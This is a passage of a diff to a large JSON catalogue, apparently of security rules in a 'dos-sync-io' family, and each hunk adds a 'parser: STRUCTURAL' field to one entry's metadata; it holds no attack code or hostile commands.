15513
15672
  "family": "dos-sync-io",
15673
+ "parser": "STRUCTURAL",
15514
15674
  "_unsigned": false,
15515
15675
  "_passThroughSigning": false,
15516
15676
  "signatureStatus": "verified",
@@ -15740,6 +15900,7 @@
15740
15900
  "unvalidated": true,
15741
15901
  "cross_language": false,
15742
15902
  "family": "dos-sync-io",
15903
+ "parser": "STRUCTURAL",
15743
15904
  "_unsigned": false,
15744
15905
  "_passThroughSigning": false,
15745
15906
  "signatureStatus": "verified",
@@ -15969,6 +16130,7 @@
15969
16130
  "unvalidated": true,
15970
16131
  "cross_language": false,
15971
16132
  "family": "dos-sync-io",
16133
+ "parser": "STRUCTURAL",
15972
16134
  "_unsigned": false,
15973
16135
  "_passThroughSigning": false,
15974
16136
  "signatureStatus": "verified",
@@ -16198,6 +16360,7 @@
16198
16360
  "unvalidated": true,
16199
16361
  "cross_language": false,
16200
16362
  "family": "dos-sync-io",
16363
+ "parser": "STRUCTURAL",
16201
16364
  "_unsigned": false,
16202
16365
  "_passThroughSigning": false,
16203
16366
  "signatureStatus": "verified",
@@ -16427,6 +16590,7 @@
16427
16590
  "unvalidated": true,
16428
16591
  "cross_language": false,
16429
16592
  "family": "dos-sync-io",
16593
+ "parser": "STRUCTURAL",
16430
16594
  "_unsigned": false,
16431
16595
  "_passThroughSigning": false,
16432
16596
  "signatureStatus": "verified",
@@ -16656,6 +16820,7 @@
16656
16820
  "unvalidated": true,
16657
16821
  "cross_language": false,
16658
16822
  "family": "dos-sync-io",
16823
+ "parser": "STRUCTURAL",
16659
16824
  "_unsigned": false,
16660
16825
  "_passThroughSigning": false,
16661
16826
  "signatureStatus": "verified",
@@ -16885,6 +17050,7 @@
16885
17050
  "unvalidated": true,
16886
17051
  "cross_language": false,
16887
17052
  "family": "dos-sync-io",
17053
+ "parser": "STRUCTURAL",
16888
17054
  "_unsigned": false,
16889
17055
  "_passThroughSigning": false,
16890
17056
  "signatureStatus": "verified",
@@ -17114,6 +17280,7 @@
17114
17280
  "unvalidated": true,
17115
17281
  "cross_language": false,
17116
17282
  "family": "dos-sync-io",
17283
+ "parser": "STRUCTURAL",
17117
17284
  "_unsigned": false,
17118
17285
  "_passThroughSigning": false,
17119
17286
  "signatureStatus": "verified",
@@ -17343,6 +17510,7 @@
17343
17510
  "unvalidated": true,
17344
17511
  "cross_language": false,
17345
17512
  "family": "dos-sync-io",
17513
+ "parser": "STRUCTURAL",
17346
17514
  "_unsigned": false,
17347
17515
  "_passThroughSigning": false,
17348
17516
  "signatureStatus": "verified",
@@ -17572,6 +17740,7 @@
17572
17740
  "unvalidated": true,
17573
17741
  "cross_language": false,
17574
17742
  "family": "dos-sync-io",
17743
+ "parser": "STRUCTURAL",
17575
17744
  "_unsigned": false,
17576
17745
  "_passThroughSigning": false,
17577
17746
  "signatureStatus": "verified",
@@ -17801,6 +17970,7 @@
17801
17970
  "unvalidated": true,
17802
17971
  "cross_language": false,
17803
17972
  "family": "dos-sync-io",
17973
+ "parser": "STRUCTURAL",
17804
17974
  "_unsigned": false,
17805
17975
  "_passThroughSigning": false,
17806
17976
  "signatureStatus": "verified",
@@ -18030,6 +18200,7 @@
18030
18200
  "unvalidated": true,
18031
18201
  "cross_language": false,
18032
18202
  "family": "dos-sync-io",
18203
+ "parser": "STRUCTURAL",
18033
18204
  "_unsigned": false,
18034
18205
  "_passThroughSigning": false,
18035
18206
  "signatureStatus": "verified",
@@ -18259,6 +18430,7 @@
18259
18430
  "unvalidated": true,
18260
18431
  "cross_language": false,
18261
18432
  "family": "dos-sync-io",
18433
+ "parser": "STRUCTURAL",
18262
18434
  "_unsigned": false,
18263
18435
  "_passThroughSigning": false,
18264
18436
  "signatureStatus": "verified",
@@ -18490,6 +18662,7 @@
18490
18662
  "unvalidated": true,
18491
18663
  "cross_language": false,
18492
18664
  "family": "dos-sync-io",
18665
+ "parser": "STRUCTURAL",
18493
18666
  "_unsigned": false,
18494
18667
  "_passThroughSigning": false,
18495
18668
  "signatureStatus": "verified",
@@ -18721,6 +18894,7 @@
18721
18894
  "unvalidated": true,
18722
18895
  "cross_language": false,
18723
18896
  "family": "dos-sync-io",
18897
+ "parser": "STRUCTURAL",
18724
18898
  "_unsigned": false,
18725
18899
  "_passThroughSigning": false,
18726
18900
  "signatureStatus": "verified",
@@ -18950,6 +19124,7 @@
18950
19124
  "unvalidated": true,
18951
19125
  "cross_language": false,
18952
19126
  "family": "dos-sync-io",
19127
+ "parser": "STRUCTURAL",
18953
19128
  "_unsigned": false,
18954
19129
  "_passThroughSigning": false,
18955
19130
  "signatureStatus": "verified",
@@ -19179,6 +19354,7 @@
19179
19354
  "unvalidated": true,
19180
19355
  "cross_language": false,
19181
19356
  "family": "dos-sync-io",
19357
+ "parser": "STRUCTURAL",
19182
19358
  "_unsigned": false,
19183
19359
  "_passThroughSigning": false,
19184
19360
  "signatureStatus": "verified",
@@ -19408,6 +19584,7 @@
19408
19584
  "unvalidated": true,
19409
19585
  "cross_language": false,
19410
19586
  "family": "dos-sync-io",
19587
+ "parser": "STRUCTURAL",
19411
19588
  "_unsigned": false,
19412
19589
  "_passThroughSigning": false,
19413
19590
  "signatureStatus": "verified",
@@ -19637,6 +19814,7 @@
19637
19814
  "unvalidated": true,
19638
19815
  "cross_language": false,
19639
19816
  "family": "dos-sync-io",
19817
+ "parser": "STRUCTURAL",
19640
19818
  "_unsigned": false,
19641
19819
  "_passThroughSigning": false,
19642
19820
  "signatureStatus": "verified",
@@ -19866,6 +20044,7 @@
19866
20044
  "unvalidated": true,
19867
20045
  "cross_language": false,
19868
20046
  "family": "dos-sync-io",
20047
+ "parser": "STRUCTURAL",
19869
20048
  "_unsigned": false,
19870
20049
  "_passThroughSigning": false,
19871
20050
  "signatureStatus": "verified",
@@ -20095,6 +20274,7 @@
20095
20274
  "unvalidated": true,
20096
20275
  "cross_language": false,
20097
20276
  "family": "dos-sync-io",
20277
+ "parser": "STRUCTURAL",
20098
20278
  "_unsigned": false,
20099
20279
  "_passThroughSigning": false,
20100
20280
  "signatureStatus": "verified",
@@ -20324,6 +20504,7 @@
20324
20504
  "unvalidated": true,
20325
20505
  "cross_language": false,
20326
20506
  "family": "dos-sync-io",
20507
+ "parser": "STRUCTURAL",
20327
20508
  "_unsigned": false,
20328
20509
  "_passThroughSigning": false,
20329
20510
  "signatureStatus": "verified",
@@ -20555,6 +20736,7 @@
20555
20736
  "unvalidated": true,
20556
20737
  "cross_language": false,
20557
20738
  "family": "dos-sync-io",
20739
+ "parser": "STRUCTURAL",
20558
20740
  "_unsigned": false,
20559
20741
  "_passThroughSigning": false,
20560
20742
  "signatureStatus": "verified",
@@ -20786,6 +20968,7 @@
20786
20968
  "unvalidated": true,
20787
20969
  "cross_language": false,
20788
20970
  "family": "dos-sync-io",
20971
+ "parser": "STRUCTURAL",
20789
20972
  "_unsigned": false,
20790
20973
  "_passThroughSigning": false,
20791
20974
  "signatureStatus": "verified",
@@ -21015,6 +21198,7 @@
21015
21198
  "unvalidated": true,
21016
21199
  "cross_language": false,
21017
21200
  "family": "dos-sync-io",
21201
+ "parser": "STRUCTURAL",
21018
21202
  "_unsigned": false,
21019
21203
  "_passThroughSigning": false,
21020
21204
  "signatureStatus": "verified",
@@ -21244,6 +21428,7 @@
21244
21428
  "unvalidated": true,
21245
21429
  "cross_language": false,
21246
21430
  "family": "dos-sync-io",
21431
+ "parser": "STRUCTURAL",
21247
21432
  "_unsigned": false,
21248
21433
  "_passThroughSigning": false,
21249
21434
  "signatureStatus": "verified",
@@ -21473,6 +21658,7 @@
21473
21658
  "unvalidated": true,
21474
21659
  "cross_language": false,
21475
21660
  "family": "dos-sync-io",
21661
+ "parser": "STRUCTURAL",
21476
21662
  "_unsigned": false,
21477
21663
  "_passThroughSigning": false,
21478
21664
  "signatureStatus": "verified",
@@ -21702,6 +21888,7 @@
21702
21888
  "unvalidated": true,
21703
21889
  "cross_language": false,
21704
21890
  "family": "dos-sync-io",
21891
+ "parser": "STRUCTURAL",
21705
21892
  "_unsigned": false,
21706
21893
  "_passThroughSigning": false,
21707
21894
  "signatureStatus": "verified",
@@ -21931,6 +22118,7 @@
21931
22118
  "unvalidated": true,
21932
22119
  "cross_language": false,
21933
22120
  "family": "dos-sync-io",
22121
+ "parser": "STRUCTURAL",
21934
22122
  "_unsigned": false,
21935
22123
  "_passThroughSigning": false,
21936
22124
  "signatureStatus": "verified",
@@ -22162,6 +22350,7 @@
22162
22350
  "unvalidated": true,
22163
22351
  "cross_language": false,
22164
22352
  "family": "dos-sync-io",
22353
+ "parser": "STRUCTURAL",
22165
22354
  "_unsigned": false,
22166
22355
  "_passThroughSigning": false,
22167
22356
  "signatureStatus": "verified",
@@ -22393,6 +22582,7 @@
22393
22582
  "unvalidated": true,
22394
22583
  "cross_language": false,
22395
22584
  "family": "dos-sync-io",
22585
+ "parser": "STRUCTURAL",
22396
22586
  "_unsigned": false,
22397
22587
  "_passThroughSigning": false,
22398
22588
  "signatureStatus": "verified",
@@ -22624,6 +22814,7 @@
22624
22814
  "unvalidated": true,
22625
22815
  "cross_language": false,
22626
22816
  "family": "dos-sync-io",
22817
+ "parser": "STRUCTURAL",
22627
22818
  "_unsigned": false,
22628
22819
  "_passThroughSigning": false,
22629
22820
  "signatureStatus": "verified",
@@ -22855,6 +23046,7 @@
22855
23046
  "unvalidated": true,
22856
23047
  "cross_language": false,
22857
23048
  "family": "dos-sync-io",
23049
+ "parser": "STRUCTURAL",
22858
23050
  "_unsigned": false,
22859
23051
  "_passThroughSigning": false,
22860
23052
  "signatureStatus": "verified",
@@ -23086,6 +23278,7 @@
23086
23278
  "unvalidated": true,
23087
23279
  "cross_language": false,
23088
23280
  "family": "dos-sync-io",
23281
+ "parser": "STRUCTURAL",
23089
23282
  "_unsigned": false,
23090
23283
  "_passThroughSigning": false,
23091
23284
  "signatureStatus": "verified",
@@ -23315,6 +23508,7 @@
23315
23508
  "unvalidated": true,
23316
23509
  "cross_language": false,
23317
23510
  "family": "dos-sync-io",
23511
+ "parser": "STRUCTURAL",
23318
23512
  "_unsigned": false,
23319
23513
  "_passThroughSigning": false,
23320
23514
  "signatureStatus": "verified",
@@ -23544,6 +23738,7 @@
23544
23738
  "unvalidated": true,
23545
23739
  "cross_language": false,
23546
23740
  "family": "dos-sync-io",
23741
+ "parser": "STRUCTURAL",
23547
23742
  "_unsigned": false,
23548
23743
  "_passThroughSigning": false,
23549
23744
  "signatureStatus": "verified",
@@ -23773,6 +23968,7 @@
23773
23968
  "unvalidated": true,
23774
23969
  "cross_language": false,
23775
23970
  "family": "dos-sync-io",
23971
+ "parser": "STRUCTURAL",
23776
23972
  "_unsigned": false,
23777
23973
  "_passThroughSigning": false,
23778
23974
  "signatureStatus": "verified",
@@ -24002,6 +24198,7 @@
24002
24198
  "unvalidated": true,
24003
24199
  "cross_language": false,
24004
24200
  "family": "dos-sync-io",
24201
+ "parser": "STRUCTURAL",
24005
24202
  "_unsigned": false,
24006
24203
  "_passThroughSigning": false,
24007
24204
  "signatureStatus": "verified",
@@ -24231,6 +24428,7 @@
24231
24428
  "unvalidated": true,
24232
24429
  "cross_language": false,
24233
24430
  "family": "dos-sync-io",
24431
+ "parser": "STRUCTURAL",
24234
24432
  "_unsigned": false,
24235
24433
  "_passThroughSigning": false,
24236
24434
  "signatureStatus": "verified",
@@ -24462,6 +24660,7 @@
24462
24660
  "unvalidated": true,
24463
24661
  "cross_language": false,
24464
24662
  "family": "dos-sync-io",
24663
+ "parser": "STRUCTURAL",
24465
24664
  "_unsigned": false,
24466
24665
  "_passThroughSigning": false,
24467
24666
  "signatureStatus": "verified",
@@ -24693,6 +24892,7 @@
24693
24892
  "unvalidated": true,
24694
24893
  "cross_language": false,
24695
24894
  "family": "dos-sync-io",
24895
+ "parser": "STRUCTURAL",
24696
24896
  "_unsigned": false,
24697
24897
  "_passThroughSigning": false,
24698
24898
  "signatureStatus": "verified",
@@ -24924,6 +25124,7 @@
24924
25124
  "unvalidated": true,
24925
25125
  "cross_language": false,
24926
25126
  "family": "dos-sync-io",
25127
+ "parser": "STRUCTURAL",
24927
25128
  "_unsigned": false,
24928
25129
  "_passThroughSigning": false,
24929
25130
  "signatureStatus": "verified",
@@ -25155,6 +25356,7 @@
25155
25356
  "unvalidated": true,
25156
25357
  "cross_language": false,
25157
25358
  "family": "dos-sync-io",
25359
+ "parser": "STRUCTURAL",
25158
25360
  "_unsigned": false,
25159
25361
  "_passThroughSigning": false,
25160
25362
  "signatureStatus": "verified",
@@ -25386,6 +25588,7 @@
25386
25588
  "unvalidated": true,
25387
25589
  "cross_language": false,
25388
25590
  "family": "dos-sync-io",
25591
+ "parser": "STRUCTURAL",
25389
25592
  "_unsigned": false,
25390
25593
  "_passThroughSigning": false,
25391
25594
  "signatureStatus": "verified",
@@ -25617,6 +25820,7 @@
25617
25820
  "unvalidated": true,
25618
25821
  "cross_language": false,
25619
25822
  "family": "dos-sync-io",
25823
+ "parser": "STRUCTURAL",
25620
25824
  "_unsigned": false,
25621
25825
  "_passThroughSigning": false,
25622
25826
  "signatureStatus": "verified",
@@ -25848,6 +26052,7 @@
25848
26052
  "unvalidated": true,
25849
26053
  "cross_language": false,
25850
26054
  "family": "dos-sync-io",
26055
+ "parser": "STRUCTURAL",
25851
26056
  "_unsigned": false,
25852
26057
  "_passThroughSigning": false,
25853
26058
  "signatureStatus": "verified",
@@ -26079,6 +26284,7 @@
26079
26284
  "unvalidated": true,
26080
26285
  "cross_language": false,
26081
26286
  "family": "dos-sync-io",
26287
+ "parser": "STRUCTURAL",
26082
26288
  "_unsigned": false,
26083
26289
  "_passThroughSigning": false,
26084
26290
  "signatureStatus": "verified",
@@ -26310,6 +26516,7 @@
26310
26516
  "unvalidated": true,
26311
26517
  "cross_language": false,
26312
26518
  "family": "dos-sync-io",
26519
+ "parser": "STRUCTURAL",
26313
26520
  "_unsigned": false,
26314
26521
  "_passThroughSigning": false,
26315
26522
  "signatureStatus": "verified",
@@ -26539,6 +26746,7 @@
26539
26746
  "unvalidated": true,
26540
26747
  "cross_language": false,
26541
26748
  "family": "dos-sync-io",
26749
+ "parser": "STRUCTURAL",
26542
26750
  "_unsigned": false,
26543
26751
  "_passThroughSigning": false,
26544
26752
  "signatureStatus": "verified",
@@ -26768,6 +26976,7 @@
26768
26976
  "unvalidated": true,
26769
26977
  "cross_language": false,
26770
26978
  "family": "dos-sync-io",
26979
+ "parser": "STRUCTURAL",
26771
26980
  "_unsigned": false,
26772
26981
  "_passThroughSigning": false,
26773
26982
  "signatureStatus": "verified",
@@ -26997,6 +27206,7 @@
26997
27206
  "unvalidated": true,
26998
27207
  "cross_language": false,
26999
27208
  "family": "dos-sync-io",
27209
+ "parser": "STRUCTURAL",
27000
27210
  "_unsigned": false,
27001
27211
  "_passThroughSigning": false,
27002
27212
  "signatureStatus": "verified",
@@ -27226,6 +27436,7 @@
27226
27436
  "unvalidated": true,
27227
27437
  "cross_language": false,
27228
27438
  "family": "dos-sync-io",
27439
+ "parser": "STRUCTURAL",
27229
27440
  "_unsigned": false,
27230
27441
  "_passThroughSigning": false,
27231
27442
  "signatureStatus": "verified",
@@ -27455,6 +27666,7 @@
27455
27666
  "unvalidated": true,
27456
27667
  "cross_language": false,
27457
27668
  "family": "dos-sync-io",
27669
+ "parser": "STRUCTURAL",
27458
27670
  "_unsigned": false,
27459
27671
  "_passThroughSigning": false,
27460
27672
  "signatureStatus": "verified",
@@ -27684,6 +27896,7 @@
27684
27896
  "unvalidated": true,
27685
27897
  "cross_language": false,
27686
27898
  "family": "dos-sync-io",
27899
+ "parser": "STRUCTURAL",
27687
27900
  "_unsigned": false,
27688
27901
  "_passThroughSigning": false,
27689
27902
  "signatureStatus": "verified",
@@ -27913,6 +28126,7 @@
27913
28126
  "unvalidated": true,
27914
28127
  "cross_language": false,
27915
28128
  "family": "dos-sync-io",
28129
+ "parser": "STRUCTURAL",
27916
28130
  "_unsigned": false,
27917
28131
  "_passThroughSigning": false,
27918
28132
  "signatureStatus": "verified",
@@ -28142,6 +28356,7 @@
28142
28356
  "unvalidated": true,
28143
28357
  "cross_language": false,
28144
28358
  "family": "dos-sync-io",
28359
+ "parser": "STRUCTURAL",
28145
28360
  "_unsigned": false,
28146
28361
  "_passThroughSigning": false,
28147
28362
  "signatureStatus": "verified",
@@ -28371,6 +28586,7 @@
28371
28586
  "unvalidated": true,
28372
28587
  "cross_language": false,
28373
28588
  "family": "dos-sync-io",
28589
+ "parser": "STRUCTURAL",
28374
28590
  "_unsigned": false,
28375
28591
  "_passThroughSigning": false,
28376
28592
  "signatureStatus": "verified",
@@ -28602,6 +28818,7 @@
28602
28818
  "unvalidated": true,
28603
28819
  "cross_language": false,
28604
28820
  "family": "dos-sync-io",
28821
+ "parser": "STRUCTURAL",
28605
28822
  "_unsigned": false,
28606
28823
  "_passThroughSigning": false,
28607
28824
  "signatureStatus": "verified",
@@ -28833,6 +29050,7 @@
28833
29050
  "unvalidated": true,
28834
29051
  "cross_language": false,
28835
29052
  "family": "dos-sync-io",
29053
+ "parser": "STRUCTURAL",
28836
29054
  "_unsigned": false,
28837
29055
  "_passThroughSigning": false,
28838
29056
  "signatureStatus": "verified",
@@ -29064,6 +29282,7 @@
29064
29282
  "unvalidated": true,
29065
29283
  "cross_language": false,
29066
29284
  "family": "dos-sync-io",
29285
+ "parser": "STRUCTURAL",
29067
29286
  "_unsigned": false,
29068
29287
  "_passThroughSigning": false,
29069
29288
  "signatureStatus": "verified",
@@ -29295,6 +29514,7 @@
29295
29514
  "unvalidated": true,
29296
29515
  "cross_language": false,
29297
29516
  "family": "dos-sync-io",
29517
+ "parser": "STRUCTURAL",
29298
29518
  "_unsigned": false,
29299
29519
  "_passThroughSigning": false,
29300
29520
  "signatureStatus": "verified",
@@ -29526,6 +29746,7 @@
29526
29746
  "unvalidated": true,
29527
29747
  "cross_language": false,
29528
29748
  "family": "dos-sync-io",
29749
+ "parser": "STRUCTURAL",
29529
29750
  "_unsigned": false,
29530
29751
  "_passThroughSigning": false,
29531
29752
  "signatureStatus": "verified",
@@ -29757,6 +29978,7 @@
29757
29978
  "unvalidated": true,
29758
29979
  "cross_language": false,
29759
29980
  "family": "dos-sync-io",
29981
+ "parser": "STRUCTURAL",
29760
29982
  "_unsigned": false,
29761
29983
  "_passThroughSigning": false,
29762
29984
  "signatureStatus": "verified",
@@ -29988,6 +30210,7 @@
29988
30210
  "unvalidated": true,
29989
30211
  "cross_language": false,
29990
30212
  "family": "dos-sync-io",
30213
+ "parser": "STRUCTURAL",
29991
30214
  "_unsigned": false,
29992
30215
  "_passThroughSigning": false,
29993
30216
  "signatureStatus": "verified",
@@ -30219,6 +30442,7 @@
30219
30442
  "unvalidated": true,
30220
30443
  "cross_language": false,
30221
30444
  "family": "dos-sync-io",
30445
+ "parser": "STRUCTURAL",
30222
30446
  "_unsigned": false,
30223
30447
  "_passThroughSigning": false,
30224
30448
  "signatureStatus": "verified",
@@ -30450,6 +30674,7 @@
30450
30674
  "unvalidated": true,
30451
30675
  "cross_language": false,
30452
30676
  "family": "dos-sync-io",
30677
+ "parser": "STRUCTURAL",
30453
30678
  "_unsigned": false,
30454
30679
  "_passThroughSigning": false,
30455
30680
  "signatureStatus": "verified",
@@ -30681,6 +30906,7 @@
30681
30906
  "unvalidated": true,
30682
30907
  "cross_language": false,
30683
30908
  "family": "dos-sync-io",
30909
+ "parser": "STRUCTURAL",
30684
30910
  "_unsigned": false,
30685
30911
  "_passThroughSigning": false,
30686
30912
  "signatureStatus": "verified",
@@ -30912,6 +31138,7 @@
30912
31138
  "unvalidated": true,
30913
31139
  "cross_language": false,
30914
31140
  "family": "dos-sync-io",
31141
+ "parser": "STRUCTURAL",
30915
31142
  "_unsigned": false,
30916
31143
  "_passThroughSigning": false,
30917
31144
  "signatureStatus": "verified",
@@ -31143,6 +31370,7 @@
31143
31370
  "unvalidated": true,
31144
31371
  "cross_language": false,
31145
31372
  "family": "dos-sync-io",
31373
+ "parser": "STRUCTURAL",
31146
31374
  "_unsigned": false,
31147
31375
  "_passThroughSigning": false,
31148
31376
  "signatureStatus": "verified",
@@ -31374,6 +31602,7 @@
31374
31602
  "unvalidated": true,
31375
31603
  "cross_language": false,
31376
31604
  "family": "dos-sync-io",
31605
+ "parser": "STRUCTURAL",
31377
31606
  "_unsigned": false,
31378
31607
  "_passThroughSigning": false,
31379
31608
  "signatureStatus": "verified",
@@ -31603,6 +31832,7 @@
31603
31832
  "unvalidated": true,
31604
31833
  "cross_language": false,
31605
31834
  "family": "dos-sync-io",
31835
+ "parser": "STRUCTURAL",
31606
31836
  "_unsigned": false,
31607
31837
  "_passThroughSigning": false,
31608
31838
  "signatureStatus": "verified",
@@ -31832,6 +32062,7 @@
31832
32062
  "unvalidated": true,
31833
32063
  "cross_language": false,
31834
32064
  "family": "dos-sync-io",
32065
+ "parser": "STRUCTURAL",
31835
32066
  "_unsigned": false,
31836
32067
  "_passThroughSigning": false,
31837
32068
  "signatureStatus": "verified",
@@ -32061,6 +32292,7 @@
32061
32292
  "unvalidated": true,
32062
32293
  "cross_language": false,
32063
32294
  "family": "dos-sync-io",
32295
+ "parser": "STRUCTURAL",
32064
32296
  "_unsigned": false,
32065
32297
  "_passThroughSigning": false,
32066
32298
  "signatureStatus": "verified",
@@ -32290,6 +32522,7 @@
32290
32522
  "unvalidated": true,
32291
32523
  "cross_language": false,
32292
32524
  "family": "dos-sync-io",
32525
+ "parser": "STRUCTURAL",
32293
32526
  "_unsigned": false,
32294
32527
  "_passThroughSigning": false,
32295
32528
  "signatureStatus": "verified",
@@ -32519,6 +32752,7 @@
32519
32752
  "unvalidated": true,
32520
32753
  "cross_language": false,
32521
32754
  "family": "dos-sync-io",
32755
+ "parser": "STRUCTURAL",
32522
32756
  "_unsigned": false,
32523
32757
  "_passThroughSigning": false,
32524
32758
  "signatureStatus": "verified",
@@ -32748,6 +32982,7 @@
32748
32982
  "unvalidated": true,
32749
32983
  "cross_language": false,
32750
32984
  "family": "dos-sync-io",
32985
+ "parser": "STRUCTURAL",
32751
32986
  "_unsigned": false,
32752
32987
  "_passThroughSigning": false,
32753
32988
  "signatureStatus": "verified",
@@ -32977,6 +33212,7 @@
32977
33212
  "unvalidated": true,
32978
33213
  "cross_language": false,
32979
33214
  "family": "dos-sync-io",
33215
+ "parser": "STRUCTURAL",
32980
33216
  "_unsigned": false,
32981
33217
  "_passThroughSigning": false,
32982
33218
  "signatureStatus": "verified",
@@ -33206,6 +33442,7 @@
33206
33442
  "unvalidated": true,
33207
33443
  "cross_language": false,
33208
33444
  "family": "dos-sync-io",
33445
+ "parser": "STRUCTURAL",
33209
33446
  "_unsigned": false,
33210
33447
  "_passThroughSigning": false,
33211
33448
  "signatureStatus": "verified",
@@ -33435,6 +33672,7 @@
33435
33672
  "unvalidated": true,
33436
33673
  "cross_language": false,
33437
33674
  "family": "dos-sync-io",
33675
+ "parser": "STRUCTURAL",
33438
33676
  "_unsigned": false,
33439
33677
  "_passThroughSigning": false,
33440
33678
  "signatureStatus": "verified",
@@ -33664,6 +33902,7 @@
33664
33902
  "unvalidated": true,
33665
33903
  "cross_language": false,
33666
33904
  "family": "dos-sync-io",
33905
+ "parser": "STRUCTURAL",
33667
33906
  "_unsigned": false,
33668
33907
  "_passThroughSigning": false,
33669
33908
  "signatureStatus": "verified",
@@ -33893,6 +34132,7 @@
33893
34132
  "unvalidated": true,
33894
34133
  "cross_language": false,
33895
34134
  "family": "dos-sync-io",
34135
+ "parser": "STRUCTURAL",
33896
34136
  "_unsigned": false,
33897
34137
  "_passThroughSigning": false,
33898
34138
  "signatureStatus": "verified",
@@ -34122,6 +34362,7 @@
34122
34362
  "unvalidated": true,
34123
34363
  "cross_language": false,
34124
34364
  "family": "dos-sync-io",
34365
+ "parser": "STRUCTURAL",
34125
34366
  "_unsigned": false,
34126
34367
  "_passThroughSigning": false,
34127
34368
  "signatureStatus": "verified",
@@ -34351,6 +34592,7 @@
34351
34592
  "unvalidated": true,
34352
34593
  "cross_language": false,
34353
34594
  "family": "dos-sync-io",
34595
+ "parser": "STRUCTURAL",
34354
34596
  "_unsigned": false,
34355
34597
  "_passThroughSigning": false,
34356
34598
  "signatureStatus": "verified",
@@ -34580,6 +34822,7 @@
34580
34822
  "unvalidated": true,
34581
34823
  "cross_language": false,
34582
34824
  "family": "dos-sync-io",
34825
+ "parser": "STRUCTURAL",
34583
34826
  "_unsigned": false,
34584
34827
  "_passThroughSigning": false,
34585
34828
  "signatureStatus": "verified",
@@ -34809,6 +35052,7 @@
34809
35052
  "unvalidated": true,
34810
35053
  "cross_language": false,
34811
35054
  "family": "dos-sync-io",
35055
+ "parser": "STRUCTURAL",
34812
35056
  "_unsigned": false,
34813
35057
  "_passThroughSigning": false,
34814
35058
  "signatureStatus": "verified",
@@ -35040,6 +35284,7 @@
35040
35284
  "unvalidated": true,
35041
35285
  "cross_language": false,
35042
35286
  "family": "dos-sync-io",
35287
+ "parser": "STRUCTURAL",
35043
35288
  "_unsigned": false,
35044
35289
  "_passThroughSigning": false,
35045
35290
  "signatureStatus": "verified",
@@ -35271,6 +35516,7 @@
35271
35516
  "unvalidated": true,
35272
35517
  "cross_language": false,
35273
35518
  "family": "dos-sync-io",
35519
+ "parser": "STRUCTURAL",
35274
35520
  "_unsigned": false,
35275
35521
  "_passThroughSigning": false,
35276
35522
  "signatureStatus": "verified",
@@ -35500,6 +35746,7 @@
35500
35746
  "unvalidated": true,
35501
35747
  "cross_language": false,
35502
35748
  "family": "dos-sync-io",
35749
+ "parser": "STRUCTURAL",
35503
35750
  "_unsigned": false,
35504
35751
  "_passThroughSigning": false,
35505
35752
  "signatureStatus": "verified",
@@ -35729,6 +35976,7 @@
35729
35976
  "unvalidated": true,
35730
35977
  "cross_language": false,
35731
35978
  "family": "dos-sync-io",
35979
+ "parser": "STRUCTURAL",
35732
35980
  "_unsigned": false,
35733
35981
  "_passThroughSigning": false,
35734
35982
  "signatureStatus": "verified",
@@ -35958,6 +36206,7 @@
35958
36206
  "unvalidated": true,
35959
36207
  "cross_language": false,
35960
36208
  "family": "dos-sync-io",
36209
+ "parser": "STRUCTURAL",
35961
36210
  "_unsigned": false,
35962
36211
  "_passThroughSigning": false,
35963
36212
  "signatureStatus": "verified",
@@ -36187,6 +36436,7 @@
36187
36436
  "unvalidated": true,
36188
36437
  "cross_language": false,
36189
36438
  "family": "dos-sync-io",
36439
+ "parser": "STRUCTURAL",
36190
36440
  "_unsigned": false,
36191
36441
  "_passThroughSigning": false,
36192
36442
  "signatureStatus": "verified",
@@ -36416,6 +36666,7 @@
36416
36666
  "unvalidated": true,
36417
36667
  "cross_language": false,
36418
36668
  "family": "dos-sync-io",
36669
+ "parser": "STRUCTURAL",
36419
36670
  "_unsigned": false,
36420
36671
  "_passThroughSigning": false,
36421
36672
  "signatureStatus": "verified",
@@ -36645,6 +36896,7 @@
36645
36896
  "unvalidated": true,
36646
36897
  "cross_language": false,
36647
36898
  "family": "dos-sync-io",
36899
+ "parser": "STRUCTURAL",
36648
36900
  "_unsigned": false,
36649
36901
  "_passThroughSigning": false,
36650
36902
  "signatureStatus": "verified",
@@ -36876,6 +37128,7 @@
36876
37128
  "unvalidated": true,
36877
37129
  "cross_language": false,
36878
37130
  "family": "dos-sync-io",
37131
+ "parser": "STRUCTURAL",
36879
37132
  "_unsigned": false,
36880
37133
  "_passThroughSigning": false,
36881
37134
  "signatureStatus": "verified",
@@ -37105,6 +37358,7 @@
37105
37358
  "unvalidated": true,
37106
37359
  "cross_language": false,
37107
37360
  "family": "dos-sync-io",
37361
+ "parser": "STRUCTURAL",
37108
37362
  "_unsigned": false,
37109
37363
  "_passThroughSigning": false,
37110
37364
  "signatureStatus": "verified",
@@ -37334,6 +37588,7 @@
37334
37588
  "unvalidated": true,
37335
37589
  "cross_language": false,
37336
37590
  "family": "dos-sync-io",
37591
+ "parser": "STRUCTURAL",
37337
37592
  "_unsigned": false,
37338
37593
  "_passThroughSigning": false,
37339
37594
  "signatureStatus": "verified",
@@ -37565,6 +37820,7 @@
37565
37820
  "unvalidated": true,
37566
37821
  "cross_language": false,
37567
37822
  "family": "dos-sync-io",
37823
+ "parser": "STRUCTURAL",
37568
37824
  "_unsigned": false,
37569
37825
  "_passThroughSigning": false,
37570
37826
  "signatureStatus": "verified",
@@ -37794,6 +38050,7 @@
37794
38050
  "unvalidated": true,
37795
38051
  "cross_language": false,
37796
38052
  "family": "dos-sync-io",
38053
+ "parser": "STRUCTURAL",
37797
38054
  "_unsigned": false,
37798
38055
  "_passThroughSigning": false,
37799
38056
  "signatureStatus": "verified",
@@ -38023,6 +38280,7 @@
38023
38280
  "unvalidated": true,
38024
38281
  "cross_language": false,
38025
38282
  "family": "dos-sync-io",
38283
+ "parser": "STRUCTURAL",
38026
38284
  "_unsigned": false,
38027
38285
  "_passThroughSigning": false,
38028
38286
  "signatureStatus": "verified",
@@ -38254,6 +38512,7 @@
38254
38512
  "unvalidated": true,
38255
38513
  "cross_language": false,
38256
38514
  "family": "dos-sync-io",
38515
+ "parser": "STRUCTURAL",
38257
38516
  "_unsigned": false,
38258
38517
  "_passThroughSigning": false,
38259
38518
  "signatureStatus": "verified",
@@ -38486,6 +38745,7 @@
38486
38745
  "unvalidated": true,
38487
38746
  "cross_language": false,
38488
38747
  "family": "dos-sync-io",
38748
+ "parser": "STRUCTURAL",
38489
38749
  "_unsigned": false,
38490
38750
  "_passThroughSigning": false,
38491
38751
  "signatureStatus": "verified",
@@ -38723,6 +38983,7 @@
38723
38983
  "unvalidated": true,
38724
38984
  "cross_language": false,
38725
38985
  "family": "dos-sync-io",
38986
+ "parser": "STRUCTURAL",
38726
38987
